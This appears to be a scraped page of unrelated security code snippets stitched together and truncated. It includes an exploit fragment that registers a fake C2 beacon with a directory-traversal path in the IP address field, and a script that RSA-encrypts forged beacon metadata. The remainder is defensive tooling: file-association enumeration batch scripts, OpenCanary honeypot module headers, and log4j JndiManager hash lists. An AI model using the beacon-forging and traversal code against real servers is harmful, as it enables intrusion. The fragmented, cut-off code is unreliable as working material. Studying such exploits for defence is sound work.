# First we need to register a beacon with a directory traversal in the ip address field | |
ip_address = "../../../../../../%s" % os.path.split(args.filepath)[0] | |
# Generate symmetric keys (used later) | |
raw_aes_keys = os.urandom(16) | |
aes_key, hmac_key = generate_keys(raw_aes_keys) | |
m = Metadata(public_key=args.public_key, cs_version=3) | |
m.public_key = args.public_key | |
m.bid = args.bid |
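import M2Crypto
import base64
import binascii

# PEM wrapper for the base64 DER public key below; the BEGIN/END lines are
# what M2Crypto's PEM BIO loader expects.
PUBKEY_TEMPLATE = "-----BEGIN PUBLIC KEY-----\n{}\n-----END PUBLIC KEY-----"

# Hex-encoded buffer to encrypt. It is decoded with unhexlify, so it has to be
# an even-length string of hex digits (binascii.Error otherwise).
plaintext = "0000BEEF00000056D48A3A7104FC17544D5A3752C6EEAED4E404B5015FAD878000000A0000000431302E30093139322E3136382E3230302E313031094445534B544F502D3337325251544D0961646D696E0972756E646C6C33322E657865"

# Load the public key from memory: wrap the base64 blob in the PEM template and
# hand it to M2Crypto via an in-memory BIO.
buf = M2Crypto.BIO.MemoryBuffer(PUBKEY_TEMPLATE.format('MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDhOfC4TICevrbgiUVK5kmvU8aNQNiCfccHxIOV4wzjOn5DpaC49NLoKMsS2fVnMI/f+cbyuqfrXMYmUX8eZDWkmflrBFNOPG8hr8oqhm1EiIvK9S+CsOuLGsEOmefqYk+Gj1nfnJ1uO9ELRv1U+OhmQ77w4u0AZWHPSNr1STYhZQIDAQAB'))
pubkey = M2Crypto.RSA.load_pub_key_bio(buf)

# RSA encryption with PKCS#1 v1.5 padding. v1.5 padding is what this format
# uses, but it is not the preferred choice for new designs (OAEP is), and the
# decoded plaintext must be shorter than the modulus minus the padding overhead
# or public_encrypt raises.
ciphertext = pubkey.public_encrypt(binascii.unhexlify(plaintext), M2Crypto.RSA.pkcs1_padding)

# base64.b64encode returns bytes on Python 3; decode so the output is the
# base64 text itself rather than the b'...' repr of a bytes object. On
# Python 2 the decode is a no-op for ASCII data, so the script stays portable.
print(base64.b64encode(ciphertext).decode("ascii"))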
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
echo Extension: %%G | |
for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
echo Program: %%J |
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
for /f "tokens=1,2 delims==" %%G in ('assoc') do ( | |
for /f "tokens=1,2 delims==" %%I in ('ftype %%H 2^> nul') do ( | |
echo %COMPUTERNAME%,%%G,%%J | |
) |
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Enumerates all files extensions ²° | |
REM °² and what opens them on Windows 10 in batch/cmd ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM ------------------------------------------------------ | |
REM |
# Module identity reported by this opencanary user module. NOTE(review): these
# look like the metadata CanaryService surfaces in alerts; confirm against the
# service class defined further down the file.
INCIDENT_NAME = "NCCGROUPHTTPS"
VERSION = "0.1"
MODULE_DESCRIPTION = "NCCGROUPHTTPS"
AUTHOR = "Ollie Whitehouse"
AUTHOR_EMAIL = "ollie.whitehouse@nccgroup.com"
# Paths of the certificate and private key, presumably for the HTTPS listener
# (the names suggest so; verify where they are loaded).
# NOTE(review): both live under /tmp, which is world-writable, and the paths
# are fixed. On a shared host another local user could pre-create or replace
# these files before the service starts; a directory with restricted
# permissions (or a mode-checked path) would be a safer home for key material.
CERT_FILE = "/tmp/selfsigned.crt"
KEY_FILE = "/tmp/private.key"
from opencanary.modules import CanaryService |
######################################################################## | |
# | |
# Thinkst Canary user module | |
# to turn into a high interactive honeypot | |
# https://canary.tools/ | |
# | |
# Ingredients used: | |
# - WSL | |
# - Developer documentation - https://canary.tools/help/user-modules | |
# - Opencanary for development - https://github.com/thinkst/opencanary/ |
######################################################################## | |
# | |
# Thinkst Canary user module | |
# to turn into a high interactive honeypot | |
# https://canary.tools/ | |
# | |
# Ingredients used: | |
# - WSL | |
# - Developer documentation - https://canary.tools/help/user-modules | |
# - Opencanary for development - https://github.com/thinkst/opencanary/ |
@echo off | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM °² Calc file hashes and check they are present ²° | |
REM °² in a file ²° | |
REM °² ²° | |
REM °² twitter: @ollieatnccgroup ²° | |
REM °²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²²° | |
REM example usage |
04fdd701809d17465c17c7e603b1b202 ./2.11.0/apache-log4j-2.11.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
415c13e7c8505fb056d540eac29b72fa ./2.8/apache-log4j-2.8-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
415c13e7c8505fb056d540eac29b72fa ./2.8.1/apache-log4j-2.8.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
04fdd701809d17465c17c7e603b1b202 ./2.9.0/apache-log4j-2.9.0-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
8b2260b1cce64144f6310876f94b1638 ./2.4.1/apache-log4j-2.4.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
a193703904a3f18fb3c90a877eb5c8a7 ./2.8.2/apache-log4j-2.8.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
3bd9f41b89ce4fe8ccbf73e43195a5ce ./2.6.1/apache-log4j-2.6.1-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
04fdd701809d17465c17c7e603b1b202 ./2.11.2/apache-log4j-2.11.2-bin/org/apache/logging/log4j/core/net/JndiManager.class | |
21f055b62c15453f0d7970a9d994cab7 ./2.13.0/apache-log4j-2.13.0-bin/org/apache/logging/lo |